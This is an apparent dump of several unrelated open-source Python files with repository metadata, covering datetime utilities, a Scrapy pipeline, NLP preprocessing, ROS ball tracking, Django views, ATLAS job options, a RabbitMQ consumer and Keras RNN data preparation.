                # don't covert timezone if source timezone already in the correct timezone
                if tz != src_tzname:
                    dt = dt.astimezone(pytz.timezone(tz))
            # accuracy == 0 means parsedatetime did not recognize the input
            if status.accuracy == 0:
                dt = None
        except TypeError:  # pragma: no cover
            dt = None

        return dt

    def timedelta(self, time_input1: str, time_input2: str) -> dict:
        """Calculate the time delta between two time expressions.

        Args:
            time_input1: The time input string (see formats above).
            time_input2: The time input string (see formats above).

        Returns:
            (dict): Dict with delta values.
        """
        time_input1: datetime = self.any_to_datetime(time_input1)
        time_input2: datetime = self.any_to_datetime(time_input2)

        diff = time_input1 - time_input2  # timedelta
        delta: object = relativedelta(time_input1, time_input2)  # relativedelta

        # totals
        total_months = (delta.years * 12) + delta.months
        # BUG FIX: years were previously counted twice (once at 52 weeks/year
        # and again through total_months at 4 weeks/month); count each unit once.
        total_weeks = (delta.years * 52) + (delta.months * 4) + delta.weeks
        total_days = diff.days  # handles leap days
        total_hours = (total_days * 24) + delta.hours
        total_minutes = (total_hours * 60) + delta.minutes
        total_seconds = (total_minutes * 60) + delta.seconds
        # BUG FIX: there are 1,000,000 microseconds per second; the previous
        # factor of 1,000 produced milliseconds mislabeled as microseconds.
        total_microseconds = (total_seconds * 1_000_000) + delta.microseconds
        return {
            'datetime_1': time_input1.isoformat(),
            'datetime_2': time_input2.isoformat(),
            'years': delta.years,
            'months': delta.months,
            'weeks': delta.weeks,
            'days': delta.days,
            'hours': delta.hours,
            'minutes': delta.minutes,
            'seconds': delta.seconds,
            'microseconds': delta.microseconds,
            'total_months': total_months,
            'total_weeks': total_weeks,
            'total_days': total_days,
            'total_hours': total_hours,
            'total_minutes': total_minutes,
            'total_seconds': total_seconds,
            'total_microseconds': total_microseconds,
        }

    @staticmethod
    def unix_time_to_datetime(time_input: str, tz: Optional[str] = None):
        """Convert timestamp into datetime.

        Convert (unix time|epoch time|posix time) in format of 1510686617
        or 1510686617.298753 to datetime.datetime type.

        .. note:: This method assumes UTC for all inputs.

        .. note:: This method accepts a 9-16 digit time_input; values longer
                  than 10 digits are treated as having sub-second precision.

        Args:
            time_input: The time input string (see formats above).
            tz: The time zone for the returned datetime (e.g. UTC).

        Returns:
            (datetime.datetime): Python datetime.datetime object, or None when
            time_input is not a unix timestamp.
        """
        dt = None
        if re.compile(r'^[0-9]{11,16}$').findall(str(time_input)):
            # handle timestamp with milliseconds and no "."
            time_input_length = len(str(time_input)) - 10
            dec = math.pow(10, time_input_length)
            time_input = float(time_input) / dec

        if re.compile(r'^[0-9]{9,10}(?:\.[0-9]{0,7})?$').findall(str(time_input)):
            dt = datetime.fromtimestamp(float(time_input), tz=pytz.timezone('UTC'))
            # don't covert timezone if dt timezone already in the correct timezone
            if tz is not None and tz != dt.tzname():
                dt = dt.astimezone(pytz.timezone(tz))
        return dt
# >>> from pytz import timezone
# >>> from datetime import datetime
# >>> time_input = 1229084481
# >>> dt = datetime.fromtimestamp(float(time_input), tz=timezone('UTC'))
# >>> dt.isoformat()
# '2008-12-12T12:21:21+00:00'
# >>> tz.normalize(dt).isoformat()
# '2008-12-12T06:21:21-06:00'
# >>> dt.astimezone(timezone('US/Central'))
# datetime.datetime(2008, 12, 12, 6, 21, 21,
# tzinfo=<DstTzInfo 'US/Central' CST-1 day, 18:00:00 STD>)
# >>> dt.astimezone(timezone('US/Central')).isoformat()
# '2008-12-12T06:21:21-06:00'
| [
"rcody@threatconnect.com"
] | rcody@threatconnect.com |
d9bc6f9e1d9c1786090d4568ac2d2cb8e76395d1 | e392bac33e75c410bf704517bb1fb9b038864276 | /amazontutorial/amazontutorial/pipelines.py | 9f6de10e2b4fa82b51cc0c3fc4449a13ee6ee108 | [] | no_license | Kipkurui-mutai/Amazon-crawler | d329b53f5ed77daaee45b82e769f11a40b702f17 | 11511ceae00c26492883e7d67e066666525aeb5c | refs/heads/master | 2022-07-16T20:51:24.668769 | 2020-05-22T12:06:27 | 2020-05-22T12:06:27 | 249,800,393 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 295 | py | # -*- coding: utf-8 -*-
# Define your item pipelines here
#
# Don't forget to add your pipeline to the ITEM_PIPELINES setting
# See: https://doc.scrapy.org/en/latest/topics/item-pipeline.html
class AmazontutorialPipeline(object):
    """Default Scrapy item pipeline: passes every item through unchanged."""

    def process_item(self, item, spider):
        """Return the scraped item as-is (no transformation or filtering)."""
        return item
| [
"hpetes69@gmail.com"
] | hpetes69@gmail.com |
473d655633f7f72afa53daced7e8c8a4a90c4f51 | a209c2238ff97d781fc6f15d9b3ae6ecf9c15b53 | /utils/preprocess.py | 6b7077e20c2ba3b9257a3940756e4f54e10dd416 | [] | no_license | Arcana-2236/Text-Classification | 1788e05e4c29ce0e7130f38cd16af5ab08fbe6fd | 69047f0ffdfc621e3cb2d59056ac93d69582090b | refs/heads/master | 2022-04-12T08:30:50.089277 | 2020-03-28T06:09:16 | 2020-03-28T06:09:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,234 | py | import os
import re
import zipfile
import pickle
import jieba
import pandas as pd
import numpy as np
from collections import Counter
from tensorflow.keras.preprocessing.text import Tokenizer
from tensorflow.keras.preprocessing.sequence import pad_sequences
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.model_selection import train_test_split
ROOT = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# input file
ZIP_DATA = os.path.join(ROOT, 'data', '百度题库.zip') # 要解压的文件
STOPWORDS = os.path.join(ROOT, 'data', 'stopwords.txt')
# output file path
# BERT
TRAIN_TSV = os.path.join(ROOT, 'data', 'train.tsv') # BERT的数据文件
DEV_TSV = os.path.join(ROOT, 'data', 'dev.tsv')
TEST_TSV = os.path.join(ROOT, 'data', 'test.tsv')
# TextCNN and Transformer
TOKENIZER_BINARIZER = os.path.join(ROOT, 'data', 'tokenizer_binarizer.pickle')
LABELS_FILE = os.path.join(ROOT, 'data', 'label.txt')
X_NPY = os.path.join(ROOT, 'data', 'x.npy') # testcnn 和 transformer的数据文件
Y_NPY = os.path.join(ROOT, 'data', 'y.npy')
def unzip_data():
    """Extract the bundled dataset archive into the project data directory.

    Returns:
        str: path of the extraction target (archive path without '.zip').
    """
    with zipfile.ZipFile(ZIP_DATA, 'r') as z:
        z.extractall(os.path.join(ROOT, 'data'))
        # BUG FIX: rstrip('.zip') strips a *character set* and would mangle
        # names ending in '.', 'z', 'i' or 'p'; remove the suffix explicitly.
        target = z.filename[:-len('.zip')] if z.filename.endswith('.zip') else z.filename
        print("已将压缩包解压至{}".format(target))
    return target
def combine_data(data_path):
    """Merge every per-topic CSV found under ``data_path`` into one DataFrame.

    The directory layout is expected to be ``.../高中_<subject>/<topic>.csv``.
    Each row gains 'subject', 'topic' and 'knowledge' columns; the raw 'item'
    text is cleaned of boilerplate and renamed to 'content'.

    Args:
        data_path: root directory of the extracted archive.

    Returns:
        pandas.DataFrame: columns are content, subject, topic, knowledge.
    """
    knowledge_re = re.compile(r'\[知识点:\]\n(.*)')  # captures the knowledge-point list
    noise_re = re.compile(r'纠错复制收藏到空间加入选题篮查看答案解析|\n|知识点:|\s|\[题目\]')  # boilerplate to strip

    def _extract_knowledge(text):
        # knowledge points are comma separated in the raw text; use spaces
        found = knowledge_re.findall(text)
        return found[0].replace(',', ' ') if found else ''

    frames = []
    for folder, _dirs, files in os.walk(data_path):
        for name in files:  # only folders that actually contain csv files
            subject = re.findall('高中_(.{2})', folder)[0]
            frame = pd.read_csv(os.path.join(folder, name))
            frame['subject'] = subject  # primary label: school subject
            frame['topic'] = name.strip('.csv')  # secondary label: topic
            frame['knowledge'] = frame['item'].apply(_extract_knowledge)
            frame['item'] = frame['item'].apply(
                lambda x: noise_re.sub('', knowledge_re.sub('', x)))
            frames.append(frame)

    combined = pd.concat(frames).rename(columns={'item': 'content'}).reset_index(drop=True)
    # drop the two scraper bookkeeping columns
    combined.drop(['web-scraper-order', 'web-scraper-start-url'], axis=1, inplace=True)
    return combined
def extract_label(df, freq=0.01):
    """Filter rare knowledge-point tags and build the combined label column.

    Tags appearing in at most ``int(len(df) * freq)`` rows are dropped; the
    remaining subject/topic/knowledge values are joined into a single
    space-separated 'label' string. ``df`` is modified in place.

    Args:
        df: DataFrame with subject, topic, knowledge and content columns.
        freq: fraction of the sample count used as the rarity threshold.

    Returns:
        pandas.DataFrame: view with only 'label' and 'content' columns.
    """
    tag_counts = Counter(' '.join(df['knowledge']).split())
    threshold = int(df.shape[0] * freq)  # occurrences a tag must exceed to survive
    print('过滤掉出现次数少于 %d 次的标签' % threshold)
    frequent = {tag for tag, count in tag_counts.items() if count > threshold}
    df['knowledge'] = df['knowledge'].apply(
        lambda cell: ' '.join(tag for tag in cell.split() if tag in frequent))
    df['label'] = df[['subject', 'topic', 'knowledge']].apply(lambda row: ' '.join(row), axis=1)
    return df[['label', 'content']]
def create_bert_data(df, small=False):
"""
对于 bert 的预处理
如果small=True:是因为自己的电脑太菜,就用比较小的数据量在本地实现模型
该函数给bert模型划分了3个数据集
"""
df['content'] = df['content'].apply(lambda x: x.replace(' ', ''))
if small:
print('use small dataset to test my local bert model really work')
train = df.sample(128)
dev = df.sample(64)
test = df.sample(64)
else:
train, test = train_test_split(df, test_size=0.2, random_state=2020)
train, dev = train_test_split(train, test_size=0.2, random_state=2020)
print('preprocess for bert!')
print('create 3 tsv file(train, dev, test) in %s' % (os.path.join(ROOT, 'data')))
train.to_csv(TRAIN_TSV, index=None, sep='\t')
dev.to_csv(DEV_TSV, index=None, sep='\t')
test.to_csv(TEST_TSV, index=None, sep='\t')
def load_stopwords():
return {line.strip() for line in open(STOPWORDS, encoding='UTF-8').readlines()}
def sentence_preprocess(sentence):
# 去标点
r = re.compile("[^\u4e00-\u9fa5]+|题目")
sentence = r.sub("", sentence) # 删除所有非汉字字符
# 切词
words = jieba.cut(sentence, cut_all=False)
# 去停用词
stop_words = load_stopwords()
words = [w for w in words if w not in stop_words]
return words
def df_preprocess(df):
"""
合并了去标点,切词,去停用词的操作
:param df:
:return:
"""
df.content = df.content.apply(sentence_preprocess)
return df
def create_testcnn_data(df, num_words=50000, maxlen=128):
# 对于label处理
mlb = MultiLabelBinarizer()
y = mlb.fit_transform(df.label.apply(lambda label: label.split()))
with open(LABELS_FILE, mode='w', encoding='utf-8') as f:
for label in mlb.classes_:
f.write(label+'\n')
# 对content处理
tokenizer = Tokenizer(num_words=num_words, oov_token="<UNK>")
tokenizer.fit_on_texts(df.content.tolist())
x = tokenizer.texts_to_sequences(df.content)
x = pad_sequences(x, maxlen=maxlen, padding='post', truncating='post') # padding
# 保存数据
np.save(X_NPY, x)
np.save(Y_NPY, y)
print('已创建并保存x,y至:\n {} \n {}'.format(X_NPY, Y_NPY))
# 同时还要保存tokenizer和 multi_label_binarizer
# 否则训练结束后无法还原把数字还原成文本
tb = {'tokenizer': tokenizer, 'binarizer': mlb} # 用个字典来保存
with open(TOKENIZER_BINARIZER, 'wb') as f:
pickle.dump(tb, f)
print('已创建并保存tokenizer和binarizer至:\n {}'.format(TOKENIZER_BINARIZER))
def load_testcnn_data():
"""
如果分开保存,那要保存6个文件太麻烦了。
所以采取读取之后划分数据集的方式
"""
# 与之前的bert同步
x = np.load(X_NPY).astype(np.float32)
y = np.load(Y_NPY).astype(np.float32)
# 与之前bert的划分方式统一
train_x, test_x, train_y, test_y = train_test_split(x, y, test_size=0.2, random_state=2020)
train_x, dev_x, train_y, dev_y = train_test_split(train_x, train_y, test_size=0.2, random_state=2020)
return train_x, dev_x, test_x, train_y, dev_y, test_y
def load_tokenizer_binarizer():
"""
读取tokenizer 和 binarizer
:return:
"""
with open(TOKENIZER_BINARIZER, 'rb') as f:
tb = pickle.load(f)
return tb['tokenizer'], tb['binarizer']
def main():
"""
合并以上所有操作
"""
data_path = unzip_data() # 解压
df = combine_data(data_path) # 合并
df = extract_label(df) # 提取标签
# 对于bert的预处理
create_bert_data(df)
# 对于testcnn和transformer的预处理
df = df_preprocess(df) # 切词,分词,去停用词
create_testcnn_data(df, num_words=50000, maxlen=128)
if __name__ == '__main__':
main()
| [
"435786117@qq.com"
] | 435786117@qq.com |
c83ec7fd080ab59cb5a297a0e3c0d169d74b5cfd | e3b36f1b8cbf64e50000b2f2720be2c6bdf57e66 | /scripts/track_ball_demo.py | db918fe70cffc4175f6d1c4f998f9ab095030a61 | [] | no_license | ketaro-m/foosball_robot | 5da7c9269c6e5663c635b964432f6e8bf56c8833 | f149f73bd3759ece3ad8d26f8ad969b4cbb8351f | refs/heads/main | 2023-04-11T03:30:18.830499 | 2021-04-24T09:30:51 | 2021-04-24T09:30:51 | 318,946,388 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,675 | py | #!/usr/bin/env python
import rospy
import sys
import cv2
from sensor_msgs.msg import Image, CameraInfo
from cv_bridge import CvBridge, CvBridgeError
import numpy as np
# parameters you need to fill in depending on the camera setting
field_area = [[37, 55], [605, 405]] # [[top-left x,y], [bottom-right x, y]]
# obtain from hsv.py
hsv_lower = np.array([20, -10, 100])
hsv_upper = np.array([50, 64, 300])
median_size = 7 # filter size for median filter
morpho_size = 13 # filter size for morphology processing
field_contour = [field_area[0],
[field_area[0][0],
field_area[1][1]],
field_area[1],
[field_area[1][0], field_area[0][1]]]
class cvBridgeDemo:
def __init__(self):
global field_contour
self.field = field_contour
self.stencil_flag = False # not to make stencil more than once
self.centers = []
self.node_name = "cv_bridge_demo"
rospy.init_node(self.node_name)
rospy.on_shutdown(self.cleanup)
self.bridge = CvBridge()
self.image_sub = rospy.Subscriber("image_rect_color", Image, self.image_callback, queue_size=1)
def image_callback(self, ros_image):
try:
frame = self.bridge.imgmsg_to_cv2(ros_image, "bgr8")
except CvBridgeError, e:
print e
input_image = np.array(frame, dtype=np.uint8)
self.process_image(input_image, True)
print(self.circles)
cv2.waitKey(1)
def process_image(self, image, debug=False):
# hsv filter
hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)
mask = cv2.inRange(hsv, hsv_lower, hsv_upper)
if (not self.stencil_flag):
self.stencil_flag = True
self.stencil = np.zeros(mask.shape).astype(mask.dtype)
cv2.fillConvexPoly(self.stencil, np.array(self.field), [255, 255, 255])
mask = cv2.bitwise_and(mask, self.stencil)
if debug:
display = cv2.bitwise_and(image, image, mask= mask)
cv2.imshow("hsv filter", display)
global median_size
mask = cv2.medianBlur(mask,median_size)
# morphology processing
global morpho_size
kernel=cv2.getStructuringElement(cv2.MORPH_ELLIPSE,(morpho_size,morpho_size))
mask = cv2.dilate(mask,kernel,iterations = 1)
mask = cv2.erode(mask,kernel,iterations = 1)
if debug:
display = cv2.bitwise_and(image, image, mask= mask)
cv2.imshow("morphology processing", display)
# make contour
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if (len(contours) == 0):
if debug:
display = image.copy()
cv2.imshow("ball region", display)
return
max_cnt = max(contours, key=lambda x: cv2.contourArea(x))
out = np.zeros_like(mask)
cv2.drawContours(out, [max_cnt], -1, color=255, thickness=-1)
# cv2.imshow("out", out)
mask = out
_, contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
if debug:
display = cv2.bitwise_and(image, image, mask= mask)
cv2.imshow("largest area", display)
# if debug:
# display = np.zeros(mask.shape, dtype=np.uint8)
# for c in contours:
# for elem in c:
# display[elem[0,1],elem[0,0]]=255
# cv2.imshow("make contours", display)
# make region
circles = []
for contour in contours:
(x,y),radius = cv2.minEnclosingCircle(contour)
center = (int(x),int(y))
radius = int(radius)
circles.append({"center":center, "radius":radius})
if debug:
display=image.copy()
cv2.rectangle(display, tuple(field_area[0]),tuple(field_area[1]), (0, 255, 0))
for i in range(5):
x = (field_area[1][0]-field_area[0][0])/6*(i+1) + field_area[0][0]
cv2.line(display,(x,field_area[0][1]),(x,field_area[1][1]),(0,255,0))
for i in range(2):
y = (field_area[1][1]-field_area[0][1])/3*(i+1) + field_area[0][1]
cv2.line(display,(field_area[0][0],y),(field_area[1][0],y),(0,255,0))
for circle in circles:
cv2.circle(display,circle["center"],circle["radius"],(0,0,255),2)
cv2.imshow("ball region", display)
self.circles = circles
def cleanup(self):
cv2.destroyAllWindows()
if __name__ == '__main__':
cvBridgeDemo()
rospy.spin()
| [
"keitaro.mrkm@gmail.com"
] | keitaro.mrkm@gmail.com |
8d48291882527bb16ae0f9179d387647b961b5cf | 2e7b7462659b7e9f6a02e000423f02e656458f84 | /website/views.py | 93afce8a31846d1868a7a08bc8bcd5423ab18cec | [] | no_license | jonlazaro/LinkedStats-Web | 144d2ce4d4a4c57976882aff7dd709da79b2ef54 | 63e5916c3315cfbe5678a654690792131fda190e | refs/heads/master | 2021-03-12T20:40:24.345161 | 2013-05-22T09:23:35 | 2013-05-22T09:23:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,344 | py | # coding: utf-8
from django.shortcuts import render_to_response, get_object_or_404
from rdflib import Namespace
from django.utils.encoding import smart_str
from django.template import RequestContext
from datetime import datetime
from django.http import Http404, HttpResponse
from sets import Set
from utils import *
import os
import json
GEONAMES_CODES = {
'A': 'country, state, region, ...',
'H': 'stream, lake, ...',
'L': 'parks, area, ...',
'P': 'city, village, ...',
'R': 'road, railroad',
'S': 'spot, building, farm',
'T': 'mountain, hill, rock, ...',
'U': 'undersea',
'V': 'forest, heath, ...'
}
#JSON_PATH = os.path.abspath(os.path.join(os.getcwd(), 'municipality_geonames.json'))
JSON_PATH = os.path.abspath(os.path.join(os.path.dirname(__file__), '../municipality_geonames.json'))
MUNICIPALITY_DICT = json.load(open(JSON_PATH))
def index(request):
details={}
kg_waste_person_mun_year, details['kg_waste_person_mun_year_query'] = get_total_waste_per_person_year_all_municipalities()
details['kg_waste_person_mun_year'] = json.dumps(kg_waste_person_mun_year)
details['municipality_points'] = MUNICIPALITY_LATLNG_DICT
return render_to_response('index.html', details, context_instance=RequestContext(request))
def doc(request):
return render_to_response('doc.html', context_instance=RequestContext(request))
def municipality_search(request):
details={}
municipality_official_names = Set()
for key, val in MUNICIPALITY_DICT.items():
if val[1]:
municipality_official_names.add(key)
details['all_municipality_names'] = sorted(list(municipality_official_names))
return render_to_response('municipality_search.html', details, context_instance=RequestContext(request))
def municipality(request, municipality_name):
details={}
try:
geonames_uri = MUNICIPALITY_DICT[municipality_name][0]
except KeyError:
raise Http404
kg_person_year, details['kg_person_year_query'] = get_kg_per_person_year_municipality(geonames_uri)
details['kg_person_year'] = json.dumps(kg_person_year)
kg_wastetype_year, details['kg_wastetype_year_query'] = get_wastekg_by_wastetype_municipality_year(geonames_uri)
details['kg_wastetype_year'] = json.dumps(kg_wastetype_year)
avg_kg_person_year, details['avg_kg_person_year_query'] = get_avg_kg_per_person_year_biscay()
details['avg_kg_person_year'] = json.dumps(avg_kg_person_year)
details['municipality_info'], details['extra_info_queries'] = get_extra_info_about_municipality(geonames_uri)
if not details['municipality_info']['name']:
details['municipality_info']['name'] = municipality_name
details['municipality_info']['lat'] = MUNICIPALITY_LATLNG_DICT[geonames_uri]["lat"]
details['municipality_info']['long'] = MUNICIPALITY_LATLNG_DICT[geonames_uri]["long"]
details['population_year'], details['population_year_query'] = get_population_year_municipality(geonames_uri)
return render_to_response('municipality.html', details, context_instance=RequestContext(request))
def population(request):
details = {}
details['population'], details['population_query'] = get_population_whole_biscay()
return render_to_response('population.html', details, context_instance=RequestContext(request))
| [
"lazaro.jon@gmail.com"
] | lazaro.jon@gmail.com |
4cb105211199b388e964f55bb905a04d35572cf9 | b22588340d7925b614a735bbbde1b351ad657ffc | /athena/LArCalorimeter/LArTest/LArConditionsTest/share/FixLArElecCalib_fix6_jobOptions.py | 59efd81bb72cab9f075cafd0a9f3b68c0147137b | [] | no_license | rushioda/PIXELVALID_athena | 90befe12042c1249cbb3655dde1428bb9b9a42ce | 22df23187ef85e9c3120122c8375ea0e7d8ea440 | refs/heads/master | 2020-12-14T22:01:15.365949 | 2020-01-19T03:59:35 | 2020-01-19T03:59:35 | 234,836,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,813 | py | ###############################################################
#
# Job options file 1
#
#==============================================================
#use McEventSelector
include( "AthenaCommon/Atlas_Gen.UnixStandardJob.py" )
from AthenaCommon.DetFlags import DetFlags
DetFlags.Calo_setOn()
DetFlags.ID_setOff()
DetFlags.Muon_setOff()
DetFlags.Truth_setOff()
DetFlags.LVL1_setOff()
DetFlags.digitize.all_setOff()
from AthenaCommon.GlobalFlags import GlobalFlags
GlobalFlags.DataSource.set_geant4()
GlobalFlags.InputFormat.set_pool()
GlobalFlags.DetGeo.set_atlas()
DetDescrVersion = "ATLAS-CSC-02-00-00"
# DetDescrVersion = "ATLAS-DC3-05"
# LArIdMapFix=7
# G4Phys ="QGSP_EMV"
# G4Phys ="QGSP_BERT"
# Switches:
# items
RunNumber = 1
#
RecreateFolder = False
WriteIOV = True
# Objects and its tag
ObjectList = []
TagList = []
# FIX
if DetDescrVersion == "ATLAS-CSC-02-00-00" :
TagNameForFix = "CSC02-F"
else :
TagNameForFix = "Wrong"
print " ERROR: wrong DetDescrVersion"
ObjectList += ["LArNoiseMC#LArNoise#/LAR/ElecCalibMC/Noise"]
ObjectList += ["LAruA2MeVMC#LAruA2MeV#/LAR/ElecCalibMC/uA2MeV"]
ObjectList += ["LArDAC2uAMC#LArDAC2uA#/LAR/ElecCalibMC/DAC2uA"]
ObjectList += ["LArRampMC#LArRamp#/LAR/ElecCalibMC/Ramp"]
TagList += ["LARElecCalibMCNoise-"+TagNameForFix]
TagList += ["LARElecCalibMCuA2MeV-"+TagNameForFix]
TagList += ["LARElecCalibMCDAC2uA-"+TagNameForFix]
TagList += ["LARElecCalibMCRamp-"+TagNameForFix]
OutputPOOLFileName = "LArFCalADC2MeV_13.0.30_v1.pool.root"
#/--------------------------------------------------------------
# Algorithm to fix the LAr Id, if needed
#/-------------------------------
theApp.Dlls += [ "LArConditionsTest" ]
theApp.TopAlg += [ "FixLArElecCalib" ]
FixLArElecCalib = Algorithm("FixLArElecCalib")
# 1=
# 2=fix for IdMapFix=1
# 3=new fsample for CSC-02
# 5=new FCAL noise and minbias
FixLArElecCalib.FixFlag =6
#--------------------------------------------------------------
# Private Application Configuration options
#--------------------------------------------------------------
theApp.Dlls += [ "LArTools" ]
include ("AtlasGeoModel/SetGeometryVersion.py")
include ("AtlasGeoModel/GeoModelInit.py")
# Other LAr related
include( "LArIdCnv/LArIdCnv_joboptions.py" )
include( "CaloDetMgrDetDescrCnv/CaloDetMgrDetDescrCnv_joboptions.py" )
include( "IdDictDetDescrCnv/IdDictDetDescrCnv_joboptions.py" )
include( "LArConditionsCommon/LArConditionsCommon_MC_jobOptions.py" )
include( "LArConditionsCommon/LArIdMap_MC_jobOptions.py" )
#--------------------------------------------------------------
EventSelector = Service( "EventSelector" )
EventSelector.RunNumber=1
#EventSelector.EventsPerRun=10;
EventSelector.EventsPerRun=2
EventSelector.FirstEvent=1
# theApp.Dlls += [ "PoolSvc", "AthenaPoolCnvSvc", "AthenaPoolCnvSvcPoolCnv", "EventAthenaPoolPoolCnv", "EventSelectorAthenaPool" ]
include( "AthenaPoolCnvSvc/AthenaPool_jobOptions.py" )
theApp.Dlls += [ "AthenaPoolCnvSvc" ]
theApp.Dlls += [ "LArCondAthenaPoolPoolCnv" ]
include( "AthenaSealSvc/AthenaSealSvc_joboptions.py" )
# AthenaSealSvc.CheckDictAtInit = True
include ("LArRawConditions/LArRawConditionsDict_joboptions.py")
# include ("LArTools/LArToolsDict_joboptions.py")
theApp.EvtMax=1
AthenaEventLoopMgr=Service("AthenaEventLoopMgr")
AthenaEventLoopMgr.OutputLevel = INFO
MessageSvc = Service( "MessageSvc" )
MessageSvc.OutputLevel = INFO
MessageSvc.defaultLimit = 1000000;
MessageSvc.Format = "% F%20W%S%7W%R%T %0W%M"
theApp.Dlls += [ "GaudiAud" ]
theAuditorSvc = AuditorSvc()
theAuditorSvc.Auditors = [ "ChronoAuditor" ]
##############################################
# Writing POOL and COOL
if len(ObjectList)>0 :
# include regstration alg (default is WriteIOV = False)
include("RegistrationServices/OutputConditionsAlg_jobOptions.py")
# List of objects container type#key#foldername
OutputConditionsAlg.ObjectList = ObjectList
OutputConditionsAlg.IOVTagList = TagList
ToolSvc = Service("ToolSvc")
ToolSvc.ConditionsAlgStream.OutputFile = OutputPOOLFileName
# Set flag to register and run interval Run1/Event1 to Run2/Event2
# Usually, only need to set Run1, others go to default
####
OutputConditionsAlg.WriteIOV = WriteIOV
OutputConditionsAlg.Run1 = 0
OutputConditionsAlg.LB1 = 0
# Set the connection string
include ( "IOVDbSvc/IOVDbSvc_jobOptions.py" )
IOVDbSvc = Service( "IOVDbSvc" )
IOVDbSvc.dbConnection="impl=cool;techno=sqlite;schema=LArElecCalib_FCalADC2MeV.db;X:OFLP200"
# For schema creation - only should be used when creating the folder,
# i.e. the first time
IOVRegSvc = Service( "IOVRegistrationSvc" )
IOVRegSvc.OutputLevel = DEBUG
IOVRegSvc.RecreateFolders = RecreateFolder
# PoolSvc.FileOpen = "update"
###########################################################################
| [
"rushioda@lxplus754.cern.ch"
] | rushioda@lxplus754.cern.ch |
86e96ae863d4f9f1817fcae036de87f3df2a15ec | e694891ff8c9d06df7b7b5def7ba71c1dba03aa8 | /rabbitmq_rabbitpy/test_rabbitmq.py | 23f166795359b1166e1d5e54aa4a636cf2e3c2e1 | [] | no_license | wangyu190810/python-skill | 78f9abb39ebfa01b92ffb2ec96c7ef57c490d68d | 719d082d47a5a82ce4a15c57dd481932a9d8f1ba | refs/heads/master | 2020-04-05T17:43:48.005145 | 2019-02-01T01:45:49 | 2019-02-01T01:45:49 | 41,524,479 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 962 | py | # -*-coding:utf-8-*-
# email:190810401@qq.com
__author__ = 'wangyu'
<<<<<<< HEAD
=======
import rabbitpy
# with rabbitpy.Connection("amqp://guest:guest@localhost:5672/%2F") as conn:
# with conn.channel() as channel:
# amqp = rabbitpy.AMQP(channel)
#
# for message in amqp.basic_consume('queue-name'):
# print(message)
#
# import rabbitpy
with rabbitpy.Connection('amqp://guest:guest@localhost:5672/%2f') as conn:
with conn.channel() as channel:
queue = rabbitpy.Queue(channel, 'example')
while len(queue) > 0:
message = queue.get()
print 'Message:'
print ' ID: %s' % message.properties['message_id']
print ' Time: %s' % message.properties['timestamp'].isoformat()
print ' Body: %s' % message.body
message.ack()
print 'There are %i more messages in the queue' % len(queue)
>>>>>>> 85e7424cf14daa2d8af9040031bec995ac70cde1
| [
"190810401@qq.com"
] | 190810401@qq.com |
6b84c5e4c27b70e319288ef6a0d7c5d40daa977f | 904c83d2063d624f0bc9cd328df0c97640786794 | /hw1/model_rnn.py | 0c26fa533f81fc2818b47add4cc659dfa33095d8 | [] | no_license | b04901066/ADLxMLDS2017 | dae194f0ea6c804b8cc3cf8a08b037025fc40bb9 | 5987c22f2a6fee6c8cbeae686c080ece895a25d8 | refs/heads/master | 2021-03-19T12:36:12.437429 | 2018-01-07T02:45:35 | 2018-01-07T02:45:35 | 106,443,977 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,524 | py | import sys
import csv
import numpy
import pandas
from collections import OrderedDict
import keras
from keras.models import Sequential, load_model
from keras.layers import Dense, Dropout, Activation
from keras.layers import TimeDistributed
from keras.layers import LSTM
from keras.preprocessing import sequence
from keras.optimizers import SGD
# fix random seed for reproducibility
# numpy.random.seed(7)
features = 108
# readin
# train.ark (1124823, 70+39) test.ark (180406, 70)
X_temp = pandas.read_csv(sys.argv[1]+'fbank/train.ark', sep=' ', header=None).values
X_temp2 = pandas.read_csv(sys.argv[1]+'mfcc/train.ark', sep=' ', header=None).values
X_temp = numpy.append( X_temp, X_temp2[:, 1:], axis=1)
# train.lab (1124823, 2)
y_temp = pandas.read_csv(sys.argv[1]+'label/train.lab', sep=',', header=None).values
map48phone_char = pandas.read_csv(sys.argv[1]+'48phone_char.map', sep='\t', header=None).values
d48tonum = OrderedDict( zip(map48phone_char[:,0], map48phone_char[:,1]) )
# aligning
d1 = OrderedDict( zip(X_temp[:,0], numpy.zeros(X_temp.shape[0])) )
d2 = OrderedDict( zip(y_temp[:,0], y_temp[:,1]) )
d1.update(d2)
y_temp = numpy.array( list( d1.values() ) )
# mapping
for i in range(y_temp.shape[0]):
y_temp[i] = d48tonum.get(str(y_temp[i]))
y_temp = y_temp.astype(numpy.int16)
# reshape
wav_count = 1
for i in range(X_temp.shape[0]):
X_temp[i, 0] = int(str(X_temp[i, 0]).split('_')[2])
for i in range(X_temp.shape[0]-1):
if X_temp[i, 0] > X_temp[i+1, 0] :
wav_count = wav_count + 1
max_time = int(numpy.amax(X_temp[:,0]))
X = numpy.zeros((wav_count, max_time, features), numpy.float)
y = numpy.zeros((wav_count, max_time, 1 ), numpy.int16)
count = 0
for i in range(X_temp.shape[0]-1):
if X_temp[i, 0] > X_temp[i+1, 0] or i == (X_temp.shape[0]-2) :
flame = X_temp[i, 0]
X_resh = numpy.reshape(X_temp[( i+1- flame) : (i+1), 1: ], (1, flame, features))
y_resh = numpy.reshape(y_temp[( i+1- flame) : (i+1) ] , (1, flame, 1))
zerofeatures = numpy.zeros((1, max_time-flame, features), numpy.float)
zero1 = numpy.ones((1, max_time-flame, 1 ), numpy.int16) * 37
# numpy.repeat( numpy.reshape( y_resh[0, flame-1,:], (1, 1, 1)), max_time-flame, axis=1)
X[count] = numpy.append( X_resh , zerofeatures, axis=1)
y[count] = numpy.append( y_resh , zero1 , axis=1)
count = count + 1
X_train = numpy.copy(X)
y_train = keras.utils.to_categorical( y , 48 )
y_train = numpy.reshape(y_train, (X_train.shape[0], X_train.shape[1], 48))
